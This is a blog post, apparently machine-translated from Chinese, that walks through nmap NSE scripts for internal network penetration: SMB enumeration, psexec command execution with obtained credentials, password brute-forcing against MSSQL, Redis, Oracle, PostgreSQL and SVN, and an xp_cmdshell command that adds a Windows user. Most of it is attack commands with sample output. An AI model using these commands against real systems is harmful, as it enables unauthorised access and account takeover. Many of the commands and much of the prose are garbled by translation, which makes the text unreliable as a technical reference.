smb-ls.nse 列举共享目录内的文件,配合smb-enum-share使用
nmap -p 445 <ip> --script smb-ls --script-args 'share=c$,path=\temp'
nmap -p 445 <ip> --script smb-enum-shares,smb-ls
Script Output
Host script results:
| smb-ls:
| Volume \\192.168.56.101\c$\
| SIZE TIME FILENAME
| 0 2007-12-02 00:20:09 AUTOEXEC.BAT
| 0 2007-12-02 00:20:09 CONFIG.SYS
| <DIR> 2007-12-02 00:53:39 Documents and Settings
| <DIR> 2009-09-08 13:26:10 e5a6b742d36facb19c5192852c43
| <DIR> 2008-12-01 02:06:29 Inetpub
| 94720 2007-02-18 00:31:38 msizap.exe
| <DIR> 2007-12-02 00:55:01 Program Files
| <DIR> 2008-12-01 02:05:52 temp
| <DIR> 2011-12-16 14:40:18 usr
| <DIR> Post Comment 2007-12-02 00:42:40 WINDOWS
| <DIR> Post Comment 2007-12-02 00:22:38 WMPub
| _
Of course, we these parameters may be combined with, and then performs
map -v -sV --min-hostgroup 50 --script = smb-os-discovery --script = smbv2-enabled --script = smb-enum-domains --script = smb-enum-groups -script = smb-enum-shares --script = smb-enum-processes --script = smb-enum-sessions --script = smb-enum-users -script = smb-ls --script = smb-security-mode --script = smb-server-stats --script = smb-system-info -p 445 -oA xx 10.65.152.101
this output disposable smb all relevant information, to save the file xx help us to see the local
smb-psexec.nse when we get to the smb user password, you can execute commands on remote hosts us via PsExec-smb
nmap --script smb-psexec.nse --script-args = smbuser = <username>, smbpass = <password > [, config = <config>] -p445 <host>
sudo nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>
Script Output
Host script results:
| smb-psexec:
| | Windows version
| | |_ Microsoft Windows 2000 [Version 5.00.2195]
| | IP Address and MAC Address from 'ipconfig.exe'
| | | Ethernet adapter Local Area Connection 2:
| | | MAC Address: 00:50:56:A1:24:C2
| | | IP Address: 10.0.0.30
| | | Ethernet adapter Local Area Connection:
| | |_ MAC Address: 00:50:56:A1:00:65
| | User list from 'net user'
| | | Administrator TestUser3 Guest
| | | IUSR_RON-WIN2K-TEST IWAM_RON-WIN2K-TEST nmap
| | | rontest123 sshd SvcCOPSSH
| | |_ test1234 Testing TsInternetUser
| | Membership of 'administrators' from 'net localgroup administrators'
| | | Administrator
| | | SvcCOPSSH
| | | test1234
| | |_ Testing
| | Can the host ping our address?
| | | Pinging 10.0.0.138 with 32 bytes of data:
| | |_ Reply from 10.0.0.138: bytes=32 time<10ms TTL=64
| | Traceroute back to the scanner
| | |_ 1 <10 ms <10 ms <10 ms 10.0.0.138
| | ARP Cache from arp.exe
| | | Internet Address Physical Address Type
| | |_ 10.0.0.138 00-50-56-a1-27-4b dynamic
| | List of listening and established connections (netstat -an)
| | | Proto Local Address Foreign Address State
| | | TCP 0.0.0.0:22 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:25 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:443 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1028 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
| | | TCP 0.0.0.0:4933 0.0.0.0:0 LISTENING
| | | TCP 10.0.0.30:139 0.0.0.0:0 LISTENING
| | | TCP 127.0.0.1:2528 127.0.0.1:2529 ESTABLISHED
| | | TCP 127.0.0.1:2529 127.0.0.1:2528 ESTABLISHED
| | | TCP 127.0.0.1:2531 127.0.0.1:2532 ESTABLISHED
| | | TCP 127.0.0.1:2532 127.0.0.1:2531 ESTABLISHED
| | | TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
| | | TCP 127.0.0.1:5152 127.0.0.1:2530 CLOSE_WAIT
| | | UDP 0.0.0.0:135 *:*
| | | UDP 0.0.0.0:445 *:*
| | | UDP 0.0.0.0:1030 *:*
| | | UDP 0.0.0.0:3456 *:*
| | | UDP 10.0.0.30:137 *:*
| | | UDP 10.0.0.30:138 *:*
| | | UDP 10.0.0.30:500 *:*
| | | UDP 10.0.0.30:4500 *:*
| | |_ UDP 127.0.0.1:1026 *:*
| | Full routing table from 'netstat -nr'
| | | ===========================================================================
| | | Interface List
| | | 0x1 ........................... MS TCP Loopback interface
| | | 0x2 ...00 50 56 a1 00 65 ...... VMware Accelerated AMD PCNet Adapter
| | | 0x1000004 ...00 50 56 a1 24 c2 ...... VMware Accelerated AMD PCNet Adapter
| | | ===========================================================================
| | | ===========================================================================
| | | Active Routes:
| | | Network Destination Netmask Gateway Interface Metric
| | | 10.0.0.0 255.255.255.0 10.0.0.30 10.0.0.30 1
| | | 10.0.0.30 255.255.255.255 127.0.0.1 127.0.0.1 1
| | | 10.255.255.255 255.255.255.255 10.0.0.30 10.0.0.30 1
| | | 127.0.0.0 255.0.0.0 127.0.0.1 127.0.0.1 1
| | | 224.0.0.0 224.0.0.0 10.0.0.30 10.0.0.30 1
| | | 10.0.0.30 255.255.255.255 255.255.255.255 2 1
| | | =================== ================================================== ======
| | | Persistent the Routes:
| | | None
| _ | _ | _ the Table Route
smb-system-info.nse obtain operating system information, environment variables, hardware information, and target host browser via smb protocol version.
nmap --script smb-system-info.nse -p445 <host>
sudo nmap -sU -sS --script smb-system-info.nse -p U:137,T:139 <host>
Script Output
Host script results:
| smb-system-info:
| | OS Details
| | | Microsoft Windows 2000 Service Pack 4 (ServerNT 5.0 build 2195)
| | | Installed on 2008-10-10 05:47:19
| | | Registered to Ron (organization: Government of Manitoba)
| | | Path: %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Graphviz2.20\Bin;
| | | Systemroot: C:\WINNT
| | |_ Page files: C:\pagefile.sys 192 384 (cleared at shutdown => 0)
| | Hardware
| | | CPU 0: Intel(R) Xeon(TM) CPU 2.80GHz [2800mhz GenuineIntel]
| | | |_ Identifier 0: x86 Family 15 Model 3 Stepping 8
SVGA II VMware: | | | _ Video Driver
| | the Browsers
| | | Internet Explorer 6.0000
_ Firefox 3.0.12 (EN-US) | | _ | _
following ms-sql-brute.nse sometimes collect certain user password It can be combined into a dictionary, for mssql machine within the crack, you can quickly get more mssql administrative privileges, access to the target machine management rights through other means.
-p-MS 445 --script nmap SQL---script Brute-args mssql.instance-All, the userdb = customuser.txt, custompass.txt passdb = <Host>
nmap -p 1433 --script MS-SQL-Brute - userdb-args = customuser.txt -script, passdb = custompass.txt <Host>
Script the Output
| MS-SQL-Brute:
| [192.168.100.128 \ the TEST]
| No Credentials found
| Warnings:
| SA: AccountLockedOut
| [192.168. 100.128 \ PROD]
| Credentials found:
| webshop_reader: Secret => the Login Success
| Testuser: secret1234 => PasswordMustChange
| _ lordvader: secret1234 => the Login Success
mssql-XP-cmdshell.nse the name suggests, when we know the mssql sa privileged user name and password, you can specify a command to execute our script by nmap, may be performed by protocol or smb MSSQL
nmap -p-445 Discover --script MSSQL, MSSQL-password-empty, the cmdshell-XP-MSSQL <Host>
nmap -p-MS 1433 --script sql- the cmdshell --script-args-XP mssql.username = SA, SA = mssql.password, MS-SQL-XP-cmdshell.cmd = "NET User Test Test / the Add" <Host>
Script the Output
| MS-SQL-XP- cmdshell:
| [192.168.56.3 \ MSSQLSERVER]
| the Command: ipconfig / All
| the Output
| ======
|
| Windows IP the Configuration
|
| Host the Name: EDUSRV011............
| Primary Dns Suffix . . . . . . . : cqure.net
| Node Type . . . . . . . . . . . . : Unknown
| IP Routing Enabled. . . . . . . . : No
| WINS Proxy Enabled. . . . . . . . : No
| DNS Suffix Search List. . . . . . : cqure.net
|
| Ethernet adapter Local Area Connection 3:
|
| Connection-specific DNS Suffix . :
| Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
| Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
| DHCP Enabled. . . . . . . . . . . : Yes
| Autoconfiguration Enabled . . . . : Yes
| IP Address. . . . . . . . . . . . : 192.168.56.3
| Subnet Mask:........... 255.255.255.0
| the Default Gateway:.........
| The DHCP Server: 192.168.56.2...........
| .......... Lease Obtained: den 21 mars 2010 00:12:10
| Lease the Expires: den 21 mars 2010 01:12:10..........
| _
redis.nse here is not to say, blasting redis user password, combined with the ssh key redis written some time ago, you can get to the rights server.
-p 6379 nmap <IP> --script Redis Brute-
Script the Output
PORT the SERVICE the STATE
6379 / TCP Open Unknown
| Redis Brute-:
| the Accounts
| Toledo -! Valid Credentials
| Statistics
| _ Performed 5000 in. 3 seconds The guesses, TPS Average: 1666
oracle-sid-brute.nse dictionary blasting mount the oracle SID
nmap --script Brute-SID = oracle---script-args = oraclesids = / path / to / sidfile -p 1521-1560 <Host>
nmap --script Brute-Oracle-SID = -p 1521-1560 <Host>
Script the Output
PORT REASON the SERVICE the STATE
1521 / TCP SYN-ACK Open Oracle
| Oracle-SID-Brute:
| ORCL
| Prod
| _ devel
pgSQL brute.nse PostgreSQL-password user I guess the script for pgsql password blasting, then under the appropriate permissions, you can read and write files, execute commands, so as to further control server to obtain permission.
-p-5432 --script pgSQL nmap Brute <Host>
Script the Output
5432 / TCP Open pgSQL
| pgSQL Brute-:
| the root: <empty> =>! Valid Credentials
| _ Test: Test =>! Valid Credentials
Oracle-enum-by Users mount dictionary, traversing the oracle of available users
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <host>
If no userdb is supplied the default userlist is used
Script Output
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-enum-users:
| haxxor is a valid user account
| noob is a valid user account
|_ patrik is a valid user account
oracle-brute.nse 知道sid之后,我们可以爆破oracle的用户密码,,然后再进行其他操作。
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <host>
Script Output
PORT STATE SERVICE REASON
1521/tcp open oracle syn-ack
| oracle-brute:
| Accounts
| system:powell => Account locked
| Haxxor: haxxor =>! Valid Credentials
| Statistics
| _ perfomed in 8 seconds The 157 guesses, Average tps: 19
svn-brute.nse lot of svn server exists within the enterprise network, the content on these svn server, we can download the source Code to find some useful information, svn-brute to svn server blasting.
Brute---script --script the svn nmap-args = the svn-brute.repo / the svn / -p 3690 <Host>
Script the Output
PORT REASON the SERVICE the STATE
3690 / TCP SYN-ACK Open the svn
| Brute-the svn:
| the Accounts
| _ Patrik: Secret => the Login correct
the Summary
-------
the X-svn at The class the contains code needed to the perform at The CRAM-MD5
authentication
the X-class at The Driver Driver Implementation Used by the contains at The Brute at The
Library
These are some of nmap script personal frequently used, internal network penetration, of course, the scan will often trigger ids or other safety equipment, so when in use, the eyes of the beholder, the wise see wisdom, can not be generalized, according to the actual circumstances to choose the right script.
Use nmap load nse script, including the network penetration in the - next
Guess you like
Origin www.cnblogs.com/nul1/p/11225207.html
Ranking